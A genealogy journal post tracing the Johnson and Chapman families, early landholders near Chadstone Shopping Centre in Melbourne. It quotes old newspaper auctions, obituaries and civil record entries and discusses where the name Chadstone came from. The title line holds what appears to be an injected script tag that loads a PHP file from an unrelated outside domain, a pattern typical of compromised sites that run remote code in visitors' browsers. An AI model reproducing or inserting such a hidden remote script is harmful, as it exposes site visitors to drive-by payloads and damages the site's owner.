WILLIAM AND REBECCA JOHNSON, JOHN AND ESTHER CHAPMAN, EARLY PIONEERS NEAR CHADSTONE SHOPPING CENTRE, MELB., VIC., AUST.<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script> :: FamilyTreeCircles.com Genealogy
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Journal by itellya


The shopping centre is situated on the east side of Chadstone Road at Melway 69 E4.

The Johnsons called their farm CHADSTONE and it was usually described as containing 14 acres on the corner of Chadstone and Dandenong Roads. Which corner? Although the property's name is not given below, there is no doubt that it was CHADSTONE.

At the Rooms,
40 and 42 Collins street East
At Twelve O'clock.
13 Acres 2 Roods 25 Perches,
At the Corner
of the
MUNRO and BAILLIEU have received Instruc-
tions from the Perpetual Trustees, Executors,
and Agency Company to SELL by AUCTION,
All that
Containing 13a. 2r 25p.,
And being Crown Portion 176,
At Gardiner.
Parish of Prahran, county of Bourke.
in the
And being:
All that piece of land having a frontage of
60ft, to the Murrumbeena road
By a depth of
135ft to a right of-way 12ft. wide.

The above property is well suited for subdivisional
purposes. It has long frontages to the Dandenong
and Chadstone roads, and is situate between the Mal-
vern-road and Murrumbeena railway station.
(P.3, Argus, 25-10-1888.)

See crown allotment 176 on the parish map.

It was on the east side of Chadstone Rd (to which the frontage was 906 links-say nine chains roughly) and extended 755+565= say 13 chains towards Dandenong. As each chain equals 1 mm on Melway map 69, this shows that the shopping centre frontage to Chadstone Rd was also that of the Johnson Farm. Rangeview Rd (10 chains from Dandenong Rd) was probably the start of Scotchman's Creek Rd in the 1870's when the Gardiner Shire was discussing metalling of the 10 chains from Dandenong Rd to Scotchman's Creek Road*. The farm's 13 chain frontage to Dandenong Rd would extend east to the west wall of the Myer extension to the shopping centre.
* https://trove.nla.gov.au/newspaper/article/109632202

The VICTORIAN PLACES page for CHADSTONE states that the locality was named after the road in c.1912. The author didn't bother to find out why Chadstone Road was so-named.

Thank goodness for the Malvern Historical Society's page about Chadstone.

MESSAGE SENT TO MALVERN HISTORICAL SOCIETY RE https://www.mbemalvern.com.au/mhs/chadstone/ with my amendments in bold type.
Well done to the person responsible for detailing the correct origin of the name, CHADSTONE.
The VICTORIAN PLACES web page needs to be provided with this information. The link follows. https://www.victorianplaces.com.au/chadstone
Its ridiculous statement. The name was in use in the 1870's!

"The name comes from Chadstone Road, which was laid out in 1912-13 in Malvern East."

The next sentence could be correct if road was changed to house or omitted. Perhaps William and Rebecca were married there.
"The (road) name probably came from the Chadstone church, north of Malvern Hills, England."

Rebecca, who had been operating "Chadstone" as a sanitorium** for about four years, died in 1877 and a clearing sale* was advertised in the following year.

At Twelve O'Clock
On the Premises,
Corner Dandenong road and Chadstone road,
Gardiner District,
Unreserved Auction Sale of
Two Cows (in Calf) and Heifers
Spring-cart and Harness
Plough, Poultry and
A Lot of Useful Sundries
To Parties Furnishing Dairymen, Farmers, and
G W TAYLOR having received Instructions from
W Johnson, Esq , will SELL by AUCTION, on
the premises as above,
Without reserve Terms-cash
G W Taylor, auctioneer, 64 Collins street west,
and 104 Chapel street, Prahran.
(P.3, Argus, 7-12-1878.)

** https://trove.nla.gov.au/newspaper/article/109632202

JOHNSON.—On the 18th inst., at Chadstone, Oakleigh, the beloved wife of William Johnson, aged 60 years.

JOHNSON Rebecca Death- mother: Mary nee LAY father: Chapman David- spouse at death:JOHNSON, William- 60, 1877, 2518/1877
KENT.—On the 11th inst, at Chadstone, Malvern, the wife of J. B. Kent of a son. (P.1, Argus, 13-8-1878.)

KENT William Alwyn Birth
mother: Mary nee CHAPMAN father:James Barr place of birth:MA LV, 1878, 17297/1878

TO BE CONTINUED. William's death record, any connection with the CHADSTONE church near the Malvern Hills in England. Related to J.B.Kent? POSSIBLY!

James Barr Kent's wife, Mary, died in 1915 at the National Bank, Prahran and her father's name was John Chapman so she was definitely not Rebecca Johnson's sister. James was an executor of his father-in-law's will as well as Mary's.

KENT.-On the 27th January, suddenly, at National Bank, Prahran, Mary, the beloved wife of James Barr Kent, aged 53 years. (Private interment.) P.1 ARGUS, 28-1-1915.

KENT Mary Death mother: Esther nee WRIGHT father: Chapman Jno place of death: Pran 53 1915 2803/1915

NOTICE is hereby given that after the expiration
of fourteen days from the publication hereof
application will be made to the Supreme Court of
Victoria, in its Probate jurisdiction, that PROBATE
of the WILL of JOHN CHAPMAN, late of East
Malvern, in the State of Victoria, market gar-
dener, deceased may be granted to James Barr
Kent of the National Bank Chapel street Prahran
in the said State, accountant, and William Simmons
of Kiewa, in the said State farmer, the
executors named in and appointed by the said
Dated the sixth day of April 1914. (P.5, Argus, 8-4-1914.)

John Chapman's father was David Chapman so he was probably Rebecca Johnson's brother, despite Rebecca's mother's birth surname being recorded as LAY. (Perhaps LAY was the way LEIGH was pronounced.)
CHAPMAN Jno Death mother: Unknown nee LEIGH father: Chapman David place of death Oleigh (Oakleigh, immediately south, across Dandenong Rd, of the Johnson property,"CHADSTONE".) 84, 1914, 3052/1914

The early history of Prahran (!912?) found on a FORGOTTEN BOOKS website reveals that J.B.Were was an early grantee of many crown allotments in the parish of Prahran.

Robert Kent, a Liverpool merchant attracted by the gold rush became Were's business partner soon after arrival and ensured that his sons had the best education available to set them up, not for academic prominence, but to provide the opportunity for success if they were prepared to work diligently. They certainly did! Take James Barr Kent for example.

Presentation Ceremony.
._ «._
Mr J. B. Kent, of the National Bank.
Mr J. B. Kent, who has had a long
and honorable service at the Prahran
branch of the National Bank, has
been granted six months leave of
absence on full pay before finally
retiring, owing to failing eyesight.

Steps were taken by a number of
citizens to tender an appropriate
" send off" to Mr Kent, and the out
come as that there was a large and
representative gathering in the
Prahran Mayoral parlor on Thurs-
day afternoon, when presentations
were made to Mr Kent. Without a
doubt Mr Kent has always been
looked upon as one of Prahran's most
popular ard estimable citizens. He
has been 43 years in the service of
the National Bank, of which period
he had spent 33 years at the Prahran
branch of the bank.

At the gathering of citizens on
Thursday afternoon His Worship the
Mayor (Cr A. A. Emblmg) presided.
The Mayor made reference to the
high esteem in which the Kent
family was held, in this connection
mentioning the guest's brothers and
sister. The National Bank was the
Council's bank, and Mr J. B. Kent
had always been willing to take the
Council's money and hold it for them.
(Hear, hear, and laughter). Mr Kent
had always taken a deep interest in
the welfare of the city. He had
given valuable help to all charitable
and patriotic movements. The citi-
zens of Prahran could not allow Mr
Kent to retire without showing their
appreciation of his services both in
his official and private life. The
Mayor, on behalf of the donors, pre-
sented Mr Kent with a cheque for
over 100 pounds; also an engrossed letter,
numerously signed, in which eulogist-
ic reference was made the
unfailing courtesy which the reci-
pient had always extended to
customers at the bark. Appreciation
was expressed at Mr Kent's services
in aid of the charities, and it was
hoped that he would long be spared
to continue his career of usefulness
as a citizen.
Mr Andrews, President of the
Melbourne Bowling Club, wished
Mr Kent every happiness in his re
Cr Willis said Mr Kent had earned
the respect acd esteem of all ; one
never heard an unkind word said of
Mr Bangs said he had known Mr
Kent for thirty years, and never once
came across him in a bad temper.
(Hear, hear, and laughter).
Mr C. N. Long, hon. sec. of the
presentation committee, said that Mr
Andrews was the first to suggest that
practical recognition should be made
of Mr Kent's past services. When
ever he (Mr Long) wanted a favor
from the bank he always got it from
Mr Kent. (Laughter).
Mr J. A. Gillespie, manager of the
National Bank, said the staff was all
of one mind in expressing regret that
Mr Kent had to take extended leave.
He was held in the highest regard.
The toast of Mr Kent's health was
honored with enthusiasm, and, in
Mr Kent said he joined the service
of the National Bank 43 years ago
as a junior clerk. At that time the
only other bank in Prahran was the
Bank of Victoria. He became ledger
keeper, and in 1878 he was trans-
ferred to Melbourne. In 1881 he
was appointed accountant at the
Prahran branch, and had been there
ever since. He had been kindly
given six months leave of absence on
full pay with a view to obtaining an
improvement in his eyesight. He
had been treated with every consi
deration. The staff had always
rendered him everv assistance. Al-
though he was saying good-bye in
his official capacity, he would still
make Prahran his future home.
(Hear, hear). He thanked them all
most sincerely for their kindness as
expressed in the presentations. (Ap
plause). etc.
(P.5, Malvern Standard, 13-10-1917.)

Coming men.
No. 6.—Mr. Robert George Kent. https://trove.nla.gov.au/newspaper/article/145710971
(P.3, Table Talk, 19-5-1893.)
In seeking an
interview with Mr. Robert George Kent, the lately
appointed Secretary for Railways, it is discovered, so
soon as the first questions are asked about him, that
he is one of those fortunate individuals born with
the invaluable gift of making friends all along the
line, by which is meant something more
than the railway line. Everyone smiles
when you ask about him, and is anxious
to explain that subtle charm in his character
that even disarmed all jealousy among his
schoolfellows when he held the envied position of
Dux at the school he attended, and has, since made
life-long friends of his associates.
No one to look at Mr. Kent would suppose
that he is on the eve of his fifteenth
birthday, having been born in Liverpool, England,
on May 21, 1843. He was the eldest son of the
late Mr. Robert Kent, who was a merchant of that
famous seaport town, attracted to Victoria at the time
of the gold fever and arriving in Melbourne with his
family by the ship Julie in October, 1852. This gentleman
started business in Market-street, Melbourne,
subsequently joining the late Mr. J. B. Were, the firm
for many years carrying on operations as Messrs. J.
B. Were, Kent and Company, in Flinders-lane. The
eldest boy Robert George Kent, was nine years
of age when he arrived in the colony, and was
educated at the old Melbourne Grammar School,
Spring-street, under Mr. Mars Miller, brother of the
late Hon. Henry Miller.

In July, 1859, when he was sixteen years of age,
Mr. Kent went into the office of Messrs. William
Nicholson and Company, general merchants. Three
months after, his employer, who was brother of Mr.
Germain Nicholson, the well-known grocer, whose
name is perpetuated in "Nicholson's Corner," Collins-street,
became Premier and Chief Secretary of
the colony. His Government, which included Mr.
(afterwards Sir) James M'Culloch as Treasurer, and
the Hon. James Service, Minister of Lands and Survey,
lasted from October, 1859, to November, 1860.
Two years later Mr. Nicholson retired from business,
and young Mr. Kent, then nineteen years old, joined
the accountants' branch of the Railway Department,
January, 1862. By the usual gradations he advanced
from one position to another until he was
appointed sub-accountant on July 1, 1879. For ten
years he remained in this position, when a variety of
circumstances combined to make his rise a phenomenal
one. When Mr. Deakin made his sensational
announcement, even for boom times, that Victoria
would hold a Centennial Exhibition, as New South
Wales had declined to do so, the Government service
was searched for a suitable official to fulfil the
important duties of secretary to the Commissioners,
and the choice fell upon Mr. G. T. A. Lavater, chief
accountant of the Railway Department. Mr. Kent
was accordingly appointed acting-accountant during
Mr. Lavater's absence, and held that position right
on, Mr. Lavater never resuming his old post, but
retiring on a substantial pension on October 1,
1891, when Mr. Kent received the appointment at
the salary attached to the office of £1,000 a year.
Only nine months later Mr. P. P. Labertouche, secretary
for Railways, retired on his pension, and Mr.
Kent was appointed in his place on July 1, 1892.
In the thirty-one years that Mr. Kent has been in
the Railway Department there has been a wonderful
expansion of the system, and an entire transformation
of the business. In 1862 there were only 93
miles of railway lines open for traffic, belonging
to the Government, namely, Melbourne to Williamstown,
Melbourne to Geelong, Melbourne to Woodend.
There are now 2,976 miles stretching to each
border town, with trunk and branch lines to every
important place in the colony. In 1862 the capital
cost of the lines then constructed was £7,000,000; by
1892 this had grown to £37,000,000. The income has
increased in proportion—the year 1862 producing
under this head £170,000, while 1892 shows a total
of £3,095,000. Momentous changes have, moreover,
taken place in the personnel of the Railway Department.

Mr. Kent has two brothers, one
of whom, Mr. Harold Kent, is traffic auditor of the
Victorian Railways, having joined the service in
March, 1859; the other, Mr. James Barr Kent, is
the accountant at one of the branches of the
National Bank of Australasia. His only sister,
Caroline, is married to Mr. G. H. Jenkins, C.M.G.,
clerk of Parliaments.
In October, 1874, Mr. Kent was married to Miss
Fanny Isabel Pride, daughter of the late Mr. James
Pride, auctioneer of Melbourne, and they have five
children, four sons and one daughter. Mr. Kent is
an active worker for the Anglican Church, being
honorary secretary and treasurer for Christ Church,
South Yarra, and three of his sons are now being
educated at the Church of England Grammar
School. In so fortunate a career it is grievous to
add that the last seven years Mr. Kent has had a
severe domestic affliction in the constant illness of his
wife, now in a very serious condition.

Another of the rapidly diminish-
ing band of district pioneers died
on 27th March in the person of
Mr John Chapman, at his resi-
dence, Chadstone road, East
Malvern, where he had lived for
57 years. He was a native of
Barnwell, Northamptonshire, Eng-
land, where he worked with his
parents at farming up to 1853,
when he came out to Melbourne.
Like many others the lure of the
goldfields attracted him and he
went to Fryer's Creek, Bendigo,
Ballarat, and other rushes, but had
small success as a seeker of
the precious metal. Returning
to Melbourne, he purchased a
block of 13 acres in Malvern Shire
(as it was then called), close to
Oakleigh. The country then was
very sparsely populated ; beyond
a few white settlers and a roaming
tribe or two of aboriginals there
were no inhabitants, and kangaroo
hunts were frequent over the
heath-clad fields. Although the
late Mr Chapman did not take
part in public affairs, he was keenly
interested up to the last in all that
transpired in the district. He was
essentially a home-loving man,
and devoted his time and energies
to the cultivation of his holding.
Many years ago he owned some
fine greyhounds and indulged in
coursing, but the sport was then
free from betting and other
objectionable features. He won
the Waterloo Cup, also a bracelet,
with Ben, a greyhound with a
fawn coat and two peculiar patches
like a saddle on its haunches.
Although unknown to many of the
younger generation, he was well
known and highly esteemed by the
old residents.
His remains were laid to rest on
Saturday last in the Oakleigh
, the Rev W. E. Secomb
officiating at the grave. The in
terment was a private one, in
accordance with Mr Chapman's
(P.3, Oakleigh and Caulfield Times, Mulgrave and Ferntree Gully Guardian, 4-4-1914.)

Now the interesting thing is that the Northampton County Council has produced an interactive map of the county and you can go straight to the tiny Hamlet of Chadstone near Castle Ashby by typing same in the town or village box and then head to John's place of origin,Barnwell(just before OUNDLE, via the A45 and A605 by entering its name in the box.
Link to the map.

That is the only Chadstone found in a CHADSTONE, ENGLAND search! And it is 97.6 miles east from the Malvern Hills district driving on the M6. St Chad's Church Shrewsbury is a bit closer to the Malvern Hills district being 63.8 miles n.n.w. via A49.
The page about St Chad's church* makes no suggestion of a connection to the origin of the place name, CHADSTONE.
* https://en.wikipedia.org/wiki/St_Chad%27s_Church,_Shrewsbury

JOHN CHAPMAN'S BLOCK OF 13 ACRES. https://nla.gov.au/nla.obj-232026675/view
Chadstone Rd went north to Waverley Rd and no grant consisted of exactly 13 acres. Crown allotment 175 granted to J.Landells was immediately north of "Chadstone", consisting of 12 acres 2 roods 2 perches. It had a frontage of 10 chains and extended east 12.5 chains so without doubt it is today occupied by Bellevue and Rangeview Avenues and the part of CHAPMAN STREET connecting them.

On the west side of Chadstone Rd, there was another grant of the same size (c/a 172) but it was just one of several grants acquired by McLure and Hinckley, north to and possibly including Fenwick St which seem to have been subdivided as a whole estate, it is unlikely that John bought c/a 172. Chapman St in c/a 175 is a fair indication that John lived there for 57 years!


There were eight results for the Chapman name.
John was buried in the Baptist section, his age and year of burial matching information provided above.

As his father was David Chapman, this result seemed most likely to be related to John.
CHAPMAN David 64 1935 Wes

This is the only death record for David Chapman in 1935.
CHAPMAN David Death
mother: Esther nee WRIGHT father: CHAPMAN John
place of death: OAKLEIGH, 64, 1935, 7787/1935

Thus David was a brother of Mary Kent whose death record I will repeat here for comparison.
KENT Mary Death
mother: Esther nee WRIGHT father: Chapman Jno
place of death: Pran 53 1915 2803/1915

None of the other 6 CHAPMANS buried at Oakleigh were children of John and Esther.

Only two death records were found for Esther Chapman between 1870 and 1930:
the first died in 1880 aged 39 (born c.1841) with no details re parents or place of death;
the second died in 1929 aged 76 (born c.1853), nee Dobson who died at Hawthorn.

The latter would have only been about nine years old when Mary Kent was born whereas the former
would have been about 21. However there was no death notice and Chapman may have been her birth surname.

John Chapman married Esther Wright in 1860.
CHAPMAN John Marriage WRIGHT, Esther 1860 4122/1860


Is this the birth record of Mary Kent or perhaps a twin sister?
There was no birth record for Mary Chapman.
The old locality name of Gardiner was used.
CHAPMAN Unnamed Female Birth
mother: Esther nee WRIGHT father: John
GARD, 1862, 4313/1862

If the latter, more bad luck?
CHAPMAN Unnamed Female Birth
mother: Esther nee WRIGHT father: John
place of birth: GARD, 1863, 16435/1863

CHAPMAN Emily Birth
mother: Esther Eliza WRIGHT father: John
place of birth: GARDINER, 1866, 4071/1866

CHAPMAN Dick Birth
mother: Esther nee WRIGHT father: John
place of birth: GARDINER, 1868, 25357/1868

CHAPMAN David Birth
mother: Esther nee WRIGHT father: John
place of birth:GARD, 1870, 18120/1870

A Google search seeking genealogical information about David Chapman, born 1870 in Victoria
led to the following page.
It has absolutely no information about his father but we've already got that!
However it confirms that his mother, Esther Eliza, did die in 1880 and that she was born in Middlesex in 1839.
It also gives birth and death details about David's spouse (born at Vaughan near Castlemaine) and children,
(birth places given as Murrumbeena for 5 and Oakleigh for the other.)

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